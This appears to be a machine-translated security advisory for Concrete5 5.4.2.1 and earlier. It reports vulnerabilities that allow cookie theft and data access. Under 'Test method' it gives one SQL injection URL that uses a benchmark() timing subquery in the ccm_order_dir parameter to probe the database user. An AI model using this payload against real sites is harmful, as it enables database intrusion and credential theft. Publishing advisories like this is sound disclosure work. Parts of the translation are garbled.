Release date: 2011-10-04
Updated on: 2011-11-14
Affected Systems:
Concrete5 Concrete5 <= 5.4.2.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 49931
Concrete5 is a free open-source content management system.
Concrete5 5.4.2.1 has multiple security vulnerabilities. Attackers can exploit these vulnerabilities to steal Cookie authentication creden。 and access or modify data.
<* Source: Ryan Dewhurst
Link: http://www.exploit-db.com/exploits/17925/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Ryan Dewhurst provides the following test methods:
Http://www.example.com/index.php/dashboard/reports/surveys? Ccm_order_by = numberOfResponses & amp; ccm_order_dir =, (select benchmark (1000000, MD5 (1) FROM btSurveyResults where CURRENT_USER () like 'root @ localhost' limit 1 )--
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Concrete5
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.concrete5.org/